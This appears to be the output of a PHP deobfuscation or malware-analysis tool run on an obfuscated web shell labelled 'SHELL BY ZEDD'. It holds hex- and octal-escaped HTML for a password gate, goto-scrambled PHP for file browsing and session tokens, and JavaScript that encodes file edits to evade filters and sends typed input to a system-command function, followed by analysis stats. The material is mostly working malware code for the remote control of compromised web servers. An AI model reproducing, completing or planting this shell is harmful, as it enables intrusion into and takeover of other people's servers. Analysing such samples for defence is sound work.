\x20\x7b\x20\143\157\154\x6f\x72\72\x20\x23\x46\106\x30\60\60\60\x3b\40\164\145\170\x74\x2d\163\x68\x61\x64\157\167\x3a\40\60\x20\60\40\62\60\160\x78\x20\43\x46\106\x30\x30\x30\x30\x3b\x20\x7d\40\x2f\x2a\40\x57\x61\162\x6e\141\x20\164\145\x6b\x73\40\x6d\x65\162\141\150\40\52\57\xa\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x31\60\x30\45\40\173\x20\143\x6f\x6c\x6f\162\72\x20\x77\150\151\x74\x65\x3b\x20\164\145\170\x74\x2d\x73\x68\x61\x64\157\x77\x3a\x20\x30\x20\x30\x20\x31\60\x70\170\40\43\146\146\x66\73\x20\175\12\x20\40\x20\40\x20\40\x20\x20\175\12\40\40\x20\x20\40\x20\40\40\xa\40\40\40\40\x20\40\x20\x20\151\x6e\x70\x75\x74\133\x74\171\x70\x65\x3d\42\160\141\163\163\x77\x6f\162\x64\42\x5d\x20\x7b\12\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\155\141\162\x67\x69\x6e\55\x62\157\164\x74\x6f\155\x3a\x20\x31\x30\x70\x78\x3b\12\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\x70\141\x64\144\x69\156\x67\x3a\40\65\x70\x78\73\xa\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\142\x6f\x72\144\x65\x72\55\162\x61\144\151\165\163\72\40\65\x70\170\x3b\12\40\x20\x20\40\40\40\40\40\175\xa\40\x20\40\40\x20\40\40\x20\12\40\40\40\x20\40\40\x20\x20\151\x6e\160\x75\164\x5b\x74\171\x70\x65\x3d\42\163\165\142\x6d\x69\x74\42\135\40\173\12\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x70\141\144\x64\151\x6e\x67\x3a\40\x38\160\170\40\61\x35\160\x78\73\12\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x62\157\162\x64\x65\162\x2d\x72\x61\x64\x69\165\163\72\40\x35\x70\x78\x3b\12\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\x62\141\x63\153\x67\x72\157\165\156\x64\55\143\157\154\x6f\162\72\x20\43\106\106\x46\x46\x46\x46\73\x20\57\x2a\x20\127\x61\x72\x6e\141\40\x6c\x61\x74\141\x72\x20\x62\145\x6c\x61\x6b\141\156\x67\40\160\165\x74\151\150\x20\52\x2f\12\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\143\157\154\x6f\162\x3a\x20\142\154\x61\143\x6b\73\x20\57\52\40\x57\141\x72\x6e\x61\x20\164\x65\153\x73\40\x68\x69\x74\x61\155\x20\x2a\57\12\40\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x63\165\x72\x73\157\162\x3a\x20\x70\x6f\151\x6e\x74\145\x72\x3b\12\40\40\x20\x20\40\x20\x20\40\175\xa\x20\x20\40\x20\74\x2f\x73\x74\x79\x6c\145\x3e\xa\x20\x20\x20\40\74\x61\165\144\x69\x6f\40\x73\x72\x63\x3d\42\x68\164\164\x70\x73\x3a\57\57\x62\x2e\x74\157\x70\x34\x74\x6f\160\x2e\151\x6f\57\155\137\x32\65\70\60\61\64\x64\156\167\60\56\x6d\160\63\42\x20\x61\165\164\157\x70\154\141\x79\x3e\x3c\57\x61\165\144\x69\x6f\x3e\12\x20\x20\x20\40\x3c\x66\x6f\x72\155\x20\155\x65\x74\x68\x6f\144\x3d\x22\120\x4f\x53\x54\x22\x20\x61\x63\164\x69\x6f\156\75\x22\42\x3e\xa\x20\40\x20\x20\40\x20\x20\40\74\150\x32\40\x63\154\x61\163\163\75\x22\147\x6c\157\x77\42\x3e\123\x48\105\x4c\x4c\x20\102\x59\x20\132\x45\x44\x44\74\x2f\150\x32\76\12\x20\40\40\40\x20\40\40\x20\x3c\x69\156\x70\165\x74\x20\x74\x79\160\x65\75\x22\160\x61\163\163\x77\157\x72\x64\42\x20\x6e\x61\x6d\x65\x3d\x22\x70\141\163\x73\x77\157\162\144\42\40\x70\154\x61\143\145\150\157\x6c\x64\145\x72\x3d\42\x4d\x61\x73\165\x6b\x6b\141\156\40\x70\141\163\x73\167\157\162\x64\x22\76\xa\40\x20\x20\40\40\x20\x20\x20\74\x69\156\x70\x75\x74\x20\x74\171\160\145\75\42\163\x75\x62\155\x69\164\x22\40\x76\141\154\165\x65\x3d\42\123\165\x62\155\x69\x74\x22\x3e\12\40\40\x20\40\x3c\57\146\157\x72\155\x3e"; die; } goto VVn9w; UH836: print "\74\x2f\164\x62\157\144\171\76\x3c\57\164\141\142\x6c\x65\x3e"; goto XSSO7; kjyBu: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\107\142"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\x62"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\142"; } else { $bytes = $bytes . "\40\142"; } } } return $bytes; } goto J2W1x; qBR_a: echo urlencode(urlencode(shifrele($default_dir))); goto DlKEc; S2ToV: function qovluquYaz() { global $default_dir; $sonDir = array(); $umumiHisseler = ''; $parse = explode("\x2f", $default_dir); $ii = 0; foreach ($parse as $hisse) { $ii++; $umumiHisseler .= $hisse . "\57"; $sonDir[] = "\x3c\141\40\x68\x72\x65\x66\x3d\x27\x6a\x61\x76\x61\163\143\162\x69\x70\x74\72\163\x65\x68\151\x66\x65\x28\x22\x3f\x71\x6f\166\x6c\x75\x71\75" . urlencode(urlencode(shifrele($umumiHisseler))) . "\42\x29\47\76" . htmlspecialchars(empty($hisse) && $ii != count($parse) ? "\x2f" : $hisse) . "\74\x2f\x61\x3e"; } $sonDir = implode("\x2f", $sonDir); print $sonDir . "\x26\156\x62\163\160\x3b\x26\156\142\163\160\73\x26\156\142\163\x70\73\x26\x6e\142\163\x70\73\x26\156\x62\163\x70\73\x26\x6e\x62\163\x70\x3b\x28\40\74\x61\x20\150\x72\x65\x66\75\x22\42\76\x52\x65\x73\145\164\x3c\x2f\x61\x3e\40\x7c\40\74\x61\x20\x68\162\145\146\x3d\42\152\141\166\141\163\143\162\151\160\x74\72\x67\157\164\157\50\51\42\x3e\107\157\x20\164\x6f\74\57\141\x3e\40\51"; } goto kjyBu; KyG1c: qovluquYaz(); goto A4uIu; A4uIu: print "\74\150\162\x3e"; goto h6gu1; ZgcDO: echo urlencode(urlencode(shifrele($default_dir))); goto MqqoL; fbJbF: echo urlencode(urlencode(shifrele($default_dir))); goto x_mUh; mbDQb: function tookYarat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $yeniTook = md5(shifrele(time() . rand(1, 99999999))); $_SESSION[$tAd] = $yeniTook; return $yeniTook; } goto S2ToV; VVn9w: $baqliFunksiyalar = explode("\54", ''); goto mA406; x_mUh: ?>
&zf="+e)}function shifrelee(){var e=document.getElementsByClassName("file_edit")[0].value,n=["a","i","e","s","l","b","u","o","p","h","\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];for(var t in n){var i=n[t];e=e.replace(new RegExp(i,"g"),"|:"+t+":|")}document.getElementsByClassName("file_edit")[0].value=e}document.getElementById("emr_et_atash").addEventListener("keyup",function(e){e.preventDefault(),13===e.keyCode&&sistemKom()})</script></body></html>

Function Calls

None

Variables

None

Stats

MD5 7faae7f668780f1571bdf57123a03827
Eval Count 0
Decode Time 78 ms